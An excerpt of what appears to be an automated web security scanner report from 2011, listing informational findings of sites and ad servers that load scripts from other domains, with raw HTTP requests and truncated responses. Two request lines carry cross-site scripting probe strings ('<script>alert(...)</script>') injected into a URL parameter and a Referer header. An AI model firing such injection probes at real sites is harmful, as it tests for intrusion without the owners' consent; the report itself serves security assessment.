!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...
</script><script language='javascript' type='text/javascript' src='http://imp.fetchback.com/serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyGU7cAGuPgwIBKUxdsQ9Q3BWxA1EZ3x6w0qfIB96GlPW2ywlNI0NZFhE4MiywKGDSB5unV2lqUhxhgGAMekDiJaeYtd7gINuD%2E3CeIfiEcy3H8lb25tJ3bNnjd62dHvf963hQDLsM7%2EBYxmzTT0uPrqnHTuSxm6TcL9vBgnMRZBiKJkVgiYVkIOTsJDRASLMpKZuZZ5IeTquS5jGLdD3te0Q1Vde7qulOqeL%2Dp635yOWTe7lPobpv5WYg%3D%3D%2C'></script>
...[SNIP]...
12.5. http://advertising.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: advertising.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: B=8d7n6ot73ufk2&b=3&s=qd

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:00:28 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 36631

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/d/lib/b2b/d/static/b2b/1.7.2/base-static.css" />
<link rel="stylesh
...[SNIP]...
</script>

<script type="text/JavaScript" src="http://yui.yahooapis.com/combo?2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/event-mouseenter/event-mouseenter-min.js&2.8.1/build/get/get-min.js&2.8.1/build/container/container-min.js&2.8.1/build/element/element-min.js&2.8.1/build/animation/animation-min.js&2.8.1/build/button/button-min.js&2.8.1/build/connection/connection-min.js&2.8.1/build/carousel/carousel-min.js&2.8.1/build/paginator/paginator-min.js&2.8.1/build/menu/menu-min.js&2.8.1/build/utilities/utilities.js&2.8.1/build/json/json-min.js&2.8.1/build/tabview/tabview-min.js&2.8.1/build/calendar/calendar-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/get/get-min.js&2.8.1/build/history/history-min.js"></script>
<script type="text/JavaScript" src="http://us.js.yimg.com/lib/rapid/rapid_1.9.0.js"></script>
<script type="text/JavaScript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/JavaScript" src="http://l.yimg.com/a/lib/b2b/d/js/swfobject.js"></script>
<script type="text/JavaScript" src="http://a.l.yimg.com/a/lib/s6/miniassist_201005241451.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_videoplayerimages.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_href.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_instrumentation.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_universalheader.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_mainmenu.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_switcher.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_switcher_home.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_listing_carouselads.js"></script>
...[SNIP]...
12.6. http://drupalsn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupalsn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: drupalsn.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.10
Last-Modified: Mon, 12 Sep 2011 11:13:13 GMT
ETag: "15370f717238f8b958e388e85f24d38b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 55122
Date: Mon, 12 Sep 2011 12:50:04 GMT
X-Varnish: 607623703
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head> <titl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div><script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
12.7. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-3717378713686065&output=html&h=60&slotname=2121162070&w=468&lmt=1315849707&flash=10.3.183&url=http%3A%2F%2Fmydirtbike.com%2F&dt=1315849730940&bpp=207&shv=r20110831&jsv=r20110719&prev_slotnames=8977042794&correlator=1315849731256&frm=4&adk=1914620364&ga_vid=879222618.1315849731&ga_sid=1315849731&ga_hid=1703698942&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=droid%20sans&dfs=12&adx=576&ady=1925&biw=1139&bih=870&eid=36887102&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=442&xpc=5FpE3kRdNR&p=http%3A//mydirtbike.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 3878
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
12.8. http://mydirtbike.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydirtbike.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: mydirtbike.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:43 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 12 Sep 2011 12:48:43 GMT
Cache-Control: must-revalidate
Connection: close
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 49947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="ht
...[SNIP]...
<meta name="google-site-verification" content="0TXFaXuBY3o7yV8rq4oQs6GZQvDyLlFeRp2dulB2YxQ" />
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
12.9. http://player.vimeo.com/video/19872101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/19872101

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/19872101?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.803795514.1314813682.1314847150.1314978007.3; __utmz=256147786.1314978007.3.3.utmcsr=blog.sipvicious.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.119
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Cargoh Artist Profile - Indigo</title><!--[if lt IE 9]><style>.a.d .z {display: block;}.a.d .bj {background: #000;filter: alpha(opacit
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.4.0/css/player.core.opt.css"><script src="http://a.vimeocdn.com/p/1.4.0/js/player.core.opt.js"></script>
...[SNIP]...
12.10. http://research.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 12 Sep 2011 12:48:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>Yahoo
...[SNIP]...
<link rel="shortcut icon" href="/themes/yresearch/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="http://yui.yahooapis.com/2.3.1/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.3.1/build/connection/connection-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.3.1/build/autocomplete/autocomplete-min.js"></script>
<script src="http://yui.yahooapis.com/3.1.1/build/yui/yui.js"></script>
...[SNIP]...
<body>
<script type="text/javascript" src="http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/169/search-min.js'></script>
...[SNIP]...
12.11. http://savannahnow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:43:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:48:52 GMT
Last-Modified: Mon, 12 Sep 2011 12:43:52 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831432"-gzip
Vary: Accept-Encoding
Content-Length: 149668
Content-Type: text/html; charset=utf-8
Age: 273
X-Cache: HIT from sms3.morris.com
X-Cache-Lookup: HIT from sms3.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</style><script type="text/javascript" src="http://www.zvents.com/misc/widgets/9585.js?63623"></script>
...[SNIP]...
<!-- start BigDoor quest bar -->
<script type="text/javascript" src="http://js.bigdoor.com/branches/release/gambit/load.min.js"></script>
...[SNIP]...
12.12. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sites/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zvents_tracker_sid=13158497232050.9525420391000807; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=222803225.1251345904.1315849732.1315849732.1315849732.1; __utmb=222803225.4.10.1315849732; __utmc=222803225; __utmz=222803225.1315849732.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; bd-local=fb-id=1B3C6937-8DDC-4B7E-95C5-7878A957141E; _chartbeat2=mu28j07dwufmztf2.1315849749723; iePersistentData_Pencil_Expand_New_129534=1

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 12:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:04:58 GMT
Last-Modified: Mon, 12 Sep 2011 12:59:58 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832398"-gzip
Vary: Accept-Encoding
Content-Length: 79084
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div style="padding-left:15px;">
       <script type="text/javascript" src="http://www.zvents.com/misc/widgets/9445.js?63623"></script>
...[SNIP]...
<!-- start BigDoor quest bar -->
<script type="text/javascript" src="http://js.bigdoor.com/branches/release/gambit/load.min.js"></script>
...[SNIP]...
12.13. http://seg.sharethis.com/getSegment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 12 Sep 2011 12:40:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 4781


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
12.14. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/1829737

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close
Content-Length: 7028

<html><head><title>ATT_Potter_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...
12.15. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/4245069

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: AA002=1311365777-4076437; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 13:06:09 GMT
Connection: close
Content-Length: 7033

<html><head><title>ATT_NoImage_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...
12.16. http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/Savannah/toppicks_savannah_top.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_fw/Savannah/toppicks_savannah_top.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
